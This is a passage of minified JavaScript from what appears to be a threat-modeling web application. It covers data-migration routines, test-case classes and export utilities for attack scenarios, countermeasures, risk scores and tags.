n.IsDone,n.Author="",n.Date="",n.ShowTimestamp=!1,n.HasCheckbox=!0};e.Data.Tasks&&e.Data.Tasks.forEach(n=>i(n)),e.mitigationProcesses&&e.mitigationProcesses.forEach(n=>{n.Tasks&&n.Tasks.forEach(r=>i(r))})}projectV5(e){e.threatMappings&&(t.renameKey(e,"threatMappings","attackScenarios"),e.attackScenarios.forEach(i=>{i.deviceThreatIDs&&t.renameKey(e,"deviceThreatIDs","systemThreatIDs")})),e.deviceThreats&&t.renameKey(e,"deviceThreats","systemThreats"),e.mitigationMappings&&t.renameKey(e,"mitigationMappings","countermeasures"),e.countermeasures&&e.countermeasures.forEach(i=>{i.threatMappingIDs&&t.renameKey(e,"threatMappingIDs","attackScenarioIDs")}),e.countermeasures&&e.countermeasures.forEach(i=>{t.renameKey(i,"mitigationID","controlID")})}projectV6(e){e.attackScenarios&&e.attackScenarios.forEach(i=>{i.Mapping&&i.Mapping.Threat&&t.renameKey(i.Mapping.Threat,"ThreatOriginID","AttackVectorID")})}projectV7(e){if(e.threatActors)for(let i=0;i<e.threatActors.length;i++)e.threatActors[i].Number=(i+1).toString();if(e.systemThreats)for(let i=0;i<e.systemThreats.length;i++)e.systemThreats[i].Number=(i+1).toString();if(e.assetGroups){let i=1;e.assetGroups.forEach(n=>{const r=e.config.assetGroups.find(c=>c.Name==n.Name);n.IsNewAsset=!r,n.IsNewAsset&&(n.Number=i.toString(),i+=1),n.associatedDataIDs&&n.associatedDataIDs.forEach(c=>{const d=e.myData.find(T=>T.ID==c);if(d){const T=e.config.myData.find(k=>k.Name==d.Name);d.IsNewAsset=!T,d.IsNewAsset&&(d.Number=i.toString(),i+=1)}})})}}configV2(e){e.attackVectors.forEach(i=>{let n=[];for(const[r,c]of Object.entries(i.ThreatIntroduced))1==c&&n.push(r);i.ThreatIntroduced=n,n=[];for(const[r,c]of Object.entries(i.ThreatExploited))1==c&&n.push(r);i.ThreatExploited=n}),e.threatCategories.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}configV3(e){e.Data.mitigationLibraryID&&t.renameKey(e.Data,"mitigationLibraryID","controlLibraryID"),e.mitigations&&t.renameKey(e,"mitigations","controls"),e.mitigationGroups&&(t.renameKey(e,"mitigationGroups","controlGroups"),e.controlGroups.forEach(i=>{t.renameKey(i,"mitigationGroupIDs","controlGroupIDs"),t.renameKey(i,"mitigationIDs","controlIDs")}))}configV4(e){if(e.attackVectorGroups)return console.log("Failed previous update"),void(e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedattackVectorIDs","mitigatedAttackVectorIDs")}));e.threatOrigins&&e.threatOriginGroups&&(t.renameKey(e,"threatOriginGroups","attackVectorGroups"),t.renameKey(e,"threatOrigins","attackVectors"),e.attackVectorGroups.forEach(i=>{t.renameKey(i,"threatOriginGroupIDs","attackVectorGroupIDs"),t.renameKey(i,"threatOriginIDs","attackVectorIDs")})),e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedThreatOriginIDs","mitigatedAttackVectorIDs")}),e.threatRules&&e.threatRules.forEach(i=>{i.Mapping&&t.renameKey(i.Mapping,"ThreatOriginID","AttackVectorID")})}configV5(e){e.stencilThreatMnemonics&&e.stencilThreatMnemonics.forEach(i=>{i.Letters&&i.Letters.forEach(n=>{null==n.ID&&(n.ID=Fo())})})}static renameKey(e,i,n){e[n]=e[i],delete e[i]}}return t.ProjectVersion=7,t.ConfigVersion=5,t.\u0275fac=function(e){return new(e||t)(At(A2),At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var zu=(()=>{return(t=zu||(zu={}))[t.NotSet=1]="NotSet",t[t.Pass=2]="Pass",t[t.Fail=3]="Fail",zu;var t})();class $g{static GetKeys(){return[zu.NotSet,zu.Pass,zu.Fail]}static ToString(a){switch(a){case zu.NotSet:return"properties.testcasestate.NotSet";case zu.Pass:return"properties.testcasestate.Pass";case zu.Fail:return"properties.testcasestate.Fail";default:return console.error("Missing State in TestCaseStateUtil.ToString()",a),"Undefined"}}}class Kg extends Ln{constructor(a,e,i){super(a),this.project=e,null==this.Status&&(this.Status=zu.NotSet),this.PreConditions||(this.PreConditions=[]),this.Steps||(this.Steps=[]),this.TestData||(this.TestData=[]),this.Summary||(this.Summary=[]),this.Images||(this.Images=[]),this.Data.linkedElementIDs||(this.Data.linkedElementIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.linkedMeasureIDs||(this.Data.linkedMeasureIDs=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get PreConditions(){return this.Data.PreConditions}set PreConditions(a){this.Data.PreConditions=a}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Steps(){return this.Data.Steps}set Steps(a){this.Data.Steps=a}get TestData(){return this.Data.TestData}set TestData(a){this.Data.TestData=a}get Summary(){return this.Data.Summary}set Summary(a){this.Data.Summary=a}get Status(){return this.Data.Status}set Status(a){this.Data.Status=a}get Images(){return this.Data.Images}set Images(a){this.Data.Images=a}get LinkedElements(){let a=[];return this.Data.linkedElementIDs.forEach(e=>{let i=this.project.GetDFDElement(e);i||(i=this.project.GetComponent(e)),i&&a.push(i)}),a}set LinkedElements(a){this.Data.linkedElementIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedMeasures(){let a=[];return this.Data.linkedMeasureIDs.forEach(e=>a.push(this.project.GetCountermeasure(e))),a}set LinkedMeasures(a){this.Data.linkedMeasureIDs=null==a?void 0:a.map(e=>e.ID)}AddLinkedElement(a){this.LinkedElements.includes(a)||this.Data.linkedElementIDs.push(a.ID)}RemoveLinkedElement(a){const e=this.Data.linkedElementIDs.indexOf(a);e>=0&&this.Data.linkedElementIDs.splice(e,1)}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddLinkedCountermeasure(a){this.LinkedMeasures.includes(a)||this.Data.linkedMeasureIDs.push(a.ID)}RemoveLinkedCountermeasure(a){const e=this.Data.linkedMeasureIDs.indexOf(a);e>=0&&this.Data.linkedMeasureIDs.splice(e,1)}GetViewOfLinkedElement(a){let e=this.project.FindDiagramOfElement(a.ID);return e||(e=this.project.GetStacks().find(i=>i.GetChildrenFlat().some(n=>n.ID==a.ID))),e}CheckUniqueNumber(){return this.project.GetTestCases().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TC"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetTesting().RemoveTestCase(this)}static FromJSON(a,e,i){return new Kg(a,e,i)}}class fM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.testCaseIDs||(this.Data.testCaseIDs=[])}get TestCases(){let a=[];return this.Data.testCaseIDs.forEach(e=>a.push(this.project.GetTestCase(e))),a}set TestCases(a){this.Data.testCaseIDs=null==a?void 0:a.map(e=>e.ID)}AddTestCase(a){this.TestCases.includes(a)||this.Data.testCaseIDs.push(a.ID)}RemoveTestCase(a){this.TestCases.includes(a)&&this.Data.testCaseIDs.splice(this.Data.testCaseIDs.indexOf(a.ID),1)}FindReferences(a,e){const i=[];return null==a||a.GetTestCases().forEach(n=>i.push({Type:li.DeleteTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteTestCase&&a.DeleteTestCase(n.Param)})}static FromJSON(a,e,i){return new fM(a,e,i)}}var jo=(()=>{return(t=jo||(jo={}))[t.AttackScenarios=1]="AttackScenarios",t[t.Countermeasures=2]="Countermeasures",t[t.SystemThreats=3]="SystemThreats",t[t.ThreatSources=4]="ThreatSources",t[t.MitigationProcesses=5]="MitigationProcesses",t[t.TestCases=6]="TestCases",jo;var t})();let Gn=(()=>{class t{}return t.wrap=(a,e)=>e?"string"==typeof e?[e.replace(/\n/g,"; ").replace(/"/g,'""')]:"number"==typeof e&&"de"==a.currentLang?[e.toString().replace(".",",")]:[e]:[""],t})();class OG{static GetKeys(){return[jo.AttackScenarios,jo.Countermeasures,jo.MitigationProcesses,jo.SystemThreats,jo.ThreatSources,jo.TestCases]}static ToString(a){switch(a){case jo.AttackScenarios:return"exporttype.AttackScenarios";case jo.Countermeasures:return"exporttype.Countermeasures";case jo.MitigationProcesses:return"exporttype.MitigationProcesses";case jo.SystemThreats:return"exporttype.SystemThreats";case jo.ThreatSources:return"exporttype.ThreatSources";case jo.TestCases:return"exporttype.TestCases";default:return console.error("Missing Export Type in ExportTypeUtil.ToString()"),"Undefined"}}}var Ol=(()=>{return(t=Ol||(Ol={}))[t.All=0]="All",t[t.Applicable=1]="Applicable",t[t.NotApplicable=2]="NotApplicable",Ol;var t})();class NG{static GetKeys(){return[Ol.All,Ol.Applicable,Ol.NotApplicable]}static ToString(a){switch(a){case Ol.All:return"exportfilters.All";case Ol.Applicable:return"exportfilters.Applicable";case Ol.NotApplicable:return"exportfilters.NotApplicable";default:return console.error("Missing Filter in ExportFilterUtil.ToString()"),"Undefined"}}}var mf=(()=>{return(t=mf||(mf={})).Number="Number",t.Name="Name",t.Description="Description",mf;var t})();class Yo{static GetKeys(){return[mf.Number,mf.Name,mf.Description]}static GetValue(a,e){if(!e)return"";let i=e[a];return i||(i=e.Data[a]),i}static ToString(a){switch(a){case mf.Number:return"general.Number";case mf.Name:return"general.Name";case mf.Description:return"properties.Description";default:return console.error("Missing Prop in ExportCommonPropertyUtil.ToString()"),"Undefined"}}}var _a=(()=>{return(t=_a||(_a={})).ThreatState="ThreatState",t.AttackVector="AttackVector",t.Targets="Targets",t.ThreatCategories="ThreatCategories",t.SystemThreats="SystemThreats",t.ThreatSources="ThreatSources",t.Diagram="Diagram",t.VectorCVSS="VectorCVSS",t.ScoreCVSS="ScoreCVSS",t.VectorOwaspRR="VectorOwaspRR",t.ScoreOwaspRR="ScoreOwaspRR",t.Severity="Severity",t.SeverityReason="SeverityReason",t.Likelihood="Likelihood",t.LikelihoodReason="LikelihoodReason",t.Risk="Risk",t.RiskReason="RiskReason",t.RiskStrategy="RiskStrategy",t.RiskStrategyReason="RiskStrategyReason",t.Countermeasures="Countermeasures",t.MyTags="MyTags",_a;var t})();class bT{static GetKeys(){return[_a.ThreatState,_a.AttackVector,_a.Targets,_a.Diagram,_a.ThreatCategories,_a.SystemThreats,_a.ThreatSources,_a.VectorCVSS,_a.ScoreCVSS,_a.VectorOwaspRR,_a.ScoreOwaspRR,_a.Severity,_a.SeverityReason,_a.Likelihood,_a.LikelihoodReason,_a.Risk,_a.RiskReason,_a.RiskStrategy,_a.RiskStrategyReason,_a.Countermeasures,_a.MyTags]}static GetValues(a,e,i){var n,r;if(null==e)return[""];const c=d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]};if(this.GetKeys().includes(a)){if([_a.Targets,_a.ThreatCategories,_a.SystemThreats,_a.ThreatSources,_a.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([_a.AttackVector].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if(a==_a.ThreatState)return c(ku.ToString);if(a==_a.VectorCVSS){const d=Wm.GetVector(e.ScoreCVSS);return Gn.wrap(i,(null==d?void 0:d.length)>8?d:"")}if(a==_a.ScoreCVSS){let d=Yo.GetValue(a,e);return d&&(d=d.Score),Gn.wrap(i,d)}if(a==_a.VectorOwaspRR)return Gn.wrap(i,Wm.GetVector(e.ScoreOwaspRR));if(a==_a.ScoreOwaspRR){let d=Yo.GetValue(a,e);return Gn.wrap(i,d?vn.ToString(d.Score):d)}if([_a.Severity,_a.Risk].includes(a))return c(vn.ToString);if([_a.Likelihood].includes(a))return c(An.ToString);if(a==_a.RiskStrategy)return c(fT.ToString);if(a==_a.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if(a==_a.Countermeasures)return Gn.wrap(i,null===(r=e.GetCountermeasures())||void 0===r?void 0:r.map(d=>d.GetLongName()).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case _a.ThreatState:return"properties.Status";case _a.AttackVector:return"general.AttackVector";case _a.Targets:return"general.Targets";case _a.ThreatCategories:return"general.ThreatCategories";case _a.SystemThreats:return"general.SystemThreats";case _a.ThreatSources:return"general.ThreatSources";case _a.Diagram:return"general.Diagram";case _a.VectorCVSS:return"report.CvssVector";case _a.ScoreCVSS:return"report.CvssScore";case _a.VectorOwaspRR:return"report.OwaspRRVector";case _a.ScoreOwaspRR:return"report.OwaspRRScore";case _a.Severity:return"properties.Severity";case _a.SeverityReason:return"properties.SeverityReason";case _a.Likelihood:return"general.Likelihood";case _a.LikelihoodReason:return"properties.LikelihoodReason";case _a.Risk:return"properties.Risk";case _a.RiskReason:return"properties.RiskReason";case _a.RiskStrategy:return"properties.RiskStrategy";case _a.RiskStrategyReason:return"properties.RiskStrategyReason";case _a.Countermeasures:return"general.Countermeasures";case _a.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportAttackScenarioPropertyUtil.ToString()"),"Undefined"}}}var go=(()=>{return(t=go||(go={})).MitigationState="MitigationState",t.Control="Control",t.Targets="Targets",t.Diagram="Diagram",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.AttackVectors="AttackVectors",t.MitigationProcess="MitigationProcess",t.MyTags="MyTags",go;var t})();class MT{static GetKeys(){return[go.MitigationState,go.MitigationProcess,go.Control,go.Targets,go.Diagram,go.AttackScenarios,go.MaxSeverity,go.MaxRisk,go.AttackVectors,go.MitigationProcess,go.MyTags]}static GetValues(a,e,i){var n,r,c,d,T;const k=q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]};if(this.GetKeys().includes(a)){if([go.Targets,go.AttackVectors,go.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>Yo.GetValue("Name",q)).join("; "));if([go.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(q=>q.GetLongName()).join("; "));if([go.Control].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([go.MitigationProcess].includes(a))return Gn.wrap(i,null===(c=e[a])||void 0===c?void 0:c.GetLongName());if(a==go.MitigationState)return k(al.ToString);if(a==go.MitigationProcess)return k(al.ToString);if(a==go.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if([go.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.AttackScenarios)||void 0===d?void 0:d.map(q=>q.Severity).filter(q=>q&&q>0))));if([go.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(T=e.AttackScenarios)||void 0===T?void 0:T.map(q=>q.Risk).filter(q=>q&&q>0))))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case go.MitigationState:return"properties.Status";case go.Control:return"general.Control";case go.Targets:return"general.Targets";case go.Diagram:return"general.Diagram";case go.AttackScenarios:return"general.AttackScenarios";case go.MaxSeverity:return"exportprops.MaxSeverity";case go.MaxRisk:return"exportprops.MaxRisk";case go.AttackVectors:return"general.AttackVectors";case go.MitigationProcess:return"general.MitigationProcess";case go.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportCountermeasurePropertyUtil.ToString()"),"Undefined"}}}var dr=(()=>{return(t=dr||(dr={})).ProcessState="MitigationProcessState",t.Progress="Progress",t.Countermeasures="Countermeasures",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.Tasks="Tasks",t.Notes="Notes",dr;var t})();class vT{static GetKeys(){return[dr.ProcessState,dr.Progress,dr.Countermeasures,dr.AttackScenarios,dr.MaxSeverity,dr.MaxRisk,dr.Tasks,dr.Notes]}static GetValues(a,e,i){var n,r,c,d,T;if(this.GetKeys().includes(a)){if([dr.Countermeasures].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>q.GetLongName()).join("; "));if([dr.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e.Countermeasures)||void 0===r?void 0:r.map(q=>q.AttackScenarios).flat().map(q=>q.GetLongName()).join("; "));if([dr.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(c=e.Countermeasures)||void 0===c?void 0:c.map(q=>q.AttackScenarios).flat().map(q=>q.Severity).filter(q=>q&&q>0))));if([dr.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.Countermeasures)||void 0===d?void 0:d.map(q=>q.AttackScenarios).flat().map(q=>q.Risk).filter(q=>q&&q>0))));if(a==dr.ProcessState)return(q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]})(C2.ToString);if(a==dr.Progress)return Gn.wrap(i,Yo.GetValue(a,e)+"%");if([dr.Tasks,dr.Notes].includes(a))return null===(T=e[a])||void 0===T?void 0:T.map(q=>q.Note)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case dr.ProcessState:return"properties.Status";case dr.Progress:return"general.Progress";case dr.Countermeasures:return"general.Countermeasures";case dr.AttackScenarios:return"general.AttackScenarios";case dr.MaxSeverity:return"exportprops.MaxSeverity";case dr.MaxRisk:return"exportprops.MaxRisk";case dr.Tasks:return"general.Tasks";case dr.Notes:return"general.Notes";default:return console.error("Missing Prop in ExportMitigationProcessProperties.ToString()"),"Undefined"}}}var ol=(()=>{return(t=ol||(ol={})).Impact="Impact",t.ImpactCats="ImpactCats",t.ThreatCategory="ThreatCategory",t.AffectedAssetObjects="AffectedAssetObjects",ol;var t})();class AT{static GetKeys(){return[ol.Impact,ol.ImpactCats,ol.ThreatCategory,ol.AffectedAssetObjects]}static GetValues(a,e,i){var n,r;if(this.GetKeys().includes(a)){if([ol.AffectedAssetObjects].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([ol.ThreatCategory].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([ol.Impact].includes(a))return(d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]})(An.ToString);if(a==ol.ImpactCats)return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(d=>i.instant(Vs.ToString(d))).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case ol.Impact:return"properties.Impact";case ol.ImpactCats:return"properties.ImpactCategories";case ol.ThreatCategory:return"general.ThreatCategory";case ol.AffectedAssetObjects:return"report.AffectedAssets";default:return console.error("Missing Prop in ExportSystemThreatPropertyUtil.ToString()"),"Undefined"}}}var Vd=(()=>{return(t=Vd||(Vd={})).Motive="Motive",t.Capabilities="Capabilities",t.Likelihood="Likelihood",Vd;var t})();class TT{static GetKeys(){return[Vd.Motive,Vd.Capabilities,Vd.Likelihood]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([Vd.Motive,Vd.Capabilities].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.join("; "));if([Vd.Likelihood].includes(a))return(c=>{const d=Yo.GetValue(a,e);return d?Gn.wrap(i,c(d)):[""]})(An.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case Vd.Motive:return"properties.Motive";case Vd.Capabilities:return"properties.Capabilities";case Vd.Likelihood:return"properties.Likelihood";default:return console.error("Missing Prop in ExportThreatSourcePropertyUtil.ToString()"),"Undefined"}}}var Ts=(()=>{return(t=Ts||(Ts={})).Status="Status",t.Version="Version",t.PreConditions="PreConditions",t.Steps="Steps",t.TestData="TestData",t.Summary="Summary",Ts;var t})();class ET{static GetKeys(){return[Ts.Status,Ts.Version,Ts.PreConditions,Ts.Steps,Ts.TestData,Ts.Summary]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([Ts.PreConditions,Ts.Steps,Ts.TestData].includes(a))return e[a];if([Ts.Summary].includes(a))return null===(n=e[a])||void 0===n?void 0:n.map(c=>c.Note);if(a==Ts.Status)return(c=>{const d=Yo.GetValue(a,e);return d?Gn.wrap(i,c(d)):[""]})($g.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case Ts.Status:return"properties.Status";case Ts.Version:return"properties.Version";case Ts.PreConditions:return"properties.PreConditions";case Ts.Steps:return"properties.Steps";case Ts.TestData:return"properties.TestData";case Ts.Summary:return"properties.Summary";default:return console.error("Missing Prop in ExportTestCasePropertyUtil.ToString()"),"Undefined"}}}var Qo=(()=>{return(t=Qo||(Qo={})).AttackScenario="AttackScenario",t.Countermeasure="Countermeasure",t.MitigationProcess="MitigationProcess",t.SystemThreat="SystemThreat",t.ThreatSources="ThreatSources",t.TestCase="TestCase",Qo;var t})();class DT{static GetKeys(a=null){return a?a==jo.AttackScenarios?[Qo.AttackScenario]:a==jo.Countermeasures?[Qo.Countermeasure]:a==jo.MitigationProcesses?[Qo.MitigationProcess]:a==jo.SystemThreats?[Qo.SystemThreat]:a==jo.ThreatSources?[Qo.ThreatSources]:a==jo.TestCases?[Qo.TestCase]:void 0:[Qo.AttackScenario,Qo.Countermeasure,Qo.SystemThreat]}static GetProperties(a){return a==Qo.AttackScenario?[...Yo.GetKeys(),...bT.GetKeys()]:a==Qo.Countermeasure?[...Yo.GetKeys(),...MT.GetKeys()]:a==Qo.MitigationProcess?[...Yo.GetKeys(),...vT.GetKeys()]:a==Qo.SystemThreat?[...Yo.GetKeys(),...AT.GetKeys()]:a==Qo.ThreatSources?[...Yo.GetKeys(),...TT.GetKeys()]:a==Qo.TestCase?[...Yo.GetKeys(),...ET.GetKeys()]:[]}static GetValues(a,e,i){const n=a.split(".");switch(n[0]){case Qo.AttackScenario:return bT.GetValues(n[1],e,i);case Qo.Countermeasure:return MT.GetValues(n[1],e,i);case Qo.MitigationProcess:return vT.GetValues(n[1],e,i);case Qo.SystemThreat:return AT.GetValues(n[1],e,i);case Qo.ThreatSources:return TT.GetValues(n[1],e,i);case Qo.TestCase:return ET.GetValues(n[1],e,i);default:return[""]}}static ToString(a){switch(a){case Qo.AttackScenario:return"exportclasses.AttackScenario";case Qo.Countermeasure:return"exportclasses.Countermeasure";case Qo.MitigationProcess:return"exportclasses.MitigationProcess";case Qo.SystemThreat:return"exportclasses.SystemThreat";case Qo.ThreatSources:return"exportclasses.ThreatSource";case Qo.TestCase:return"exportclasses.TestCase";default:return console.error("Missing Export Class in ExportClassUtil.ToString()"),"Undefined"}}}class xT extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.ExportType||(this.ExportType=jo.AttackScenarios),null==this.ExportFilter&&(this.ExportFilter=Ol.Applicable)}get ExportType(){return this.Data.ExportType}set ExportType(a){this.Data.ExportType=a}get ExportFilter(){return this.Data.ExportFilter}set ExportFilter(a){this.Data.ExportFilter=a}get HasExportFilter(){return[jo.AttackScenarios,jo.Countermeasures].includes(this.ExportType)}get Template(){return this.Data.Template}set Template(a){this.Data.Template=a}GetRowData(a){const e=[];let i;return this.ExportType==jo.AttackScenarios?i=this.ExportFilter==Ol.Applicable?this.project.GetAttackScenariosApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetAttackScenariosNotApplicable():this.project.GetAttackScenarios():this.ExportType==jo.Countermeasures?i=this.ExportFilter==Ol.Applicable?this.project.GetCountermeasuresApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetCountermeasuresNotApplicable():this.project.GetCountermeasures():this.ExportType==jo.MitigationProcesses?i=this.project.GetMitigationProcesses():this.ExportType==jo.SystemThreats?i=this.project.GetSystemThreats():this.ExportType==jo.ThreatSources?i=this.project.GetThreatSources().Sources:this.ExportType==jo.TestCases&&(i=this.project.GetTesting().TestCases),i.sort((n,r)=>Number(n.Number)-Number(r.Number)),i.forEach(n=>{var r,c,d;let T=[];const k=[];for(let q=0;q<this.Template.length;q++)if(this.Template[q].value){let Y=DT.GetValues(this.Template[q].value,n,a);if(Y.length>=1?(null===(r=Y[0])||void 0===r?void 0:r.length)>0?T.push(a.instant(Y[0])):T.push(Y[0]):T.push(""),Y.length>1){k[q]=[];for(let te=1;te<Y.length;te++)(null===(c=Y[te])||void 0===c?void 0:c.length)>0?k[q].push(a.instant(Y[te])):k[q].push(Y[te])}}if(e.push(T),k.length>0){const q=Math.max(...k.map(Y=>null==Y?void 0:Y.length).filter(Y=>Y));for(let Y=0;Y<q;Y++){T=[];for(let te=0;te<this.Template.length;te++)(null===(d=k[te])||void 0===d?void 0:d.length)>Y?T.push(k[te][Y]):T.push("");e.push(T)}}}),e}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new xT(a,e,i)}}var id=(()=>{return(t=id||(id={}))[t.Severity=1]="Severity",t[t.Risk=2]="Risk",t[t.Countermeasure=3]="Countermeasure",id;var t})();class LG{static GetKeys(){return[id.Severity,id.Risk,id.Countermeasure]}static ToString(a){switch(a){case id.Severity:return"properties.tagcharttype.Severity";case id.Risk:return"properties.tagcharttype.Risk";case id.Countermeasure:return"properties.tagcharttype.Countermeasure";default:return console.error("Missing State in TagChartTypeUtil.ToString()",a),"Undefined"}}}class pM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Color||(this.Color="#2196f3")}get Color(){return this.Data.Color}set Color(a){this.Data.Color=a}get ColorPicker(){var a;if((null===(a=this.colorPicker)||void 0===a?void 0:a.toHexString())!=this.Color){let e=this.Color.replace("#","").match(/.{1,2}/g),i=[parseInt(e[0],16),parseInt(e[1],16),parseInt(e[2],16)];this.colorPicker=new Pp(i[0],i[1],i[2])}return this.colorPicker}set ColorPicker(a){this.Color=a.toHexString()}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromAttackScenario,Param:n})),null==a||a.GetCountermeasures().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromCountermeasure,Param:n})),null==a||a.GetMyTagCharts().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromMyTagChart,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{(n.Type==li.RemoveMyTagFromAttackScenario||n.Type==li.RemoveMyTagFromCountermeasure||n.Type==li.RemoveMyTagFromMyTagChart)&&n.Param.RemoveMyTag(this.ID)})}static FromJSON(a,e,i){return new pM(a,e,i)}}class wT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.myTagIDs||(this.Data.myTagIDs=[]),this.Type||(this.Type=id.Severity)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}FindReferences(a,e){return[]}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{})}static FromJSON(a,e,i){return new wT(a,e,i)}}class uf extends Ln{constructor(a,e){if(super(a),this.fileChanged=!1,this.changeLog=[],this.assetGroups=[],this.myData=[],this.threatActors=[],this.systemThreats=[],this.contextElementMap=new Map,this.dfdElementMap=new Map,this.diagrams=[],this.stacks=[],this.componentMap=new Map,this.attackScenarioMap=new Map,this.countermeasureMap=new Map,this.mitigationProcesses=[],this.checklists=[],this.testCases=[],this.myTags=[],this.myTagCharts=[],this.exportTemplates=[],this.AssetsChanged=new Tt,this.MyDatasChanged=new Tt,this.DevicesChanged=new Tt,this.MobileAppsChanged=new Tt,this.ContextElementsChanged=new Tt,this.DFDElementsChanged=new Tt,this.MyComponentsChanged=new Tt,this.DiagramsChanged=new Tt,this.ThreatActorsChanged=new Tt,this.SystemThreatsChanged=new Tt,this.AttackScenariosChanged=new Tt,this.CountermeasuresChanged=new Tt,this.MitigationProcessesChanged=new Tt,this.TestCasesChanged=new Tt,this.deepDiffMapper={KEY_CHANGETYP:"cT",KEY_OLDDATA:"oD",KEY_NEWDATA:"nD",map:function(n,r){if(this.isFunction(n)||this.isFunction(r))throw"Invalid argument. Function given, object expected.";if(this.isValue(n)||this.isValue(r))return{cT:this.compareValues(n,r),oD:n,nD:r};var c={};for(var d in n)if(!this.isFunction(n[d])){var T=void 0;void 0!==r[d]&&(T=r[d]),c[d]=this.map(n[d],T)}for(var d in r)this.isFunction(r[d])||void 0!==c[d]||(c[d]=this.map(void 0,r[d]));return c},compareValues:function(n,r){return n===r||this.isDate(n)&&this.isDate(r)&&n.getTime()===r.getTime()?0:void 0===n?Ja.Added:void 0===r?Ja.Removed:Ja.Changed},isFunction:function(n){return"[object Function]"===Object.prototype.toString.call(n)},isArray:function(n){return"[object Array]"===Object.prototype.toString.call(n)},isDate:function(n){return"[object Date]"===Object.prototype.toString.call(n)},isObject:function(n){return"[object 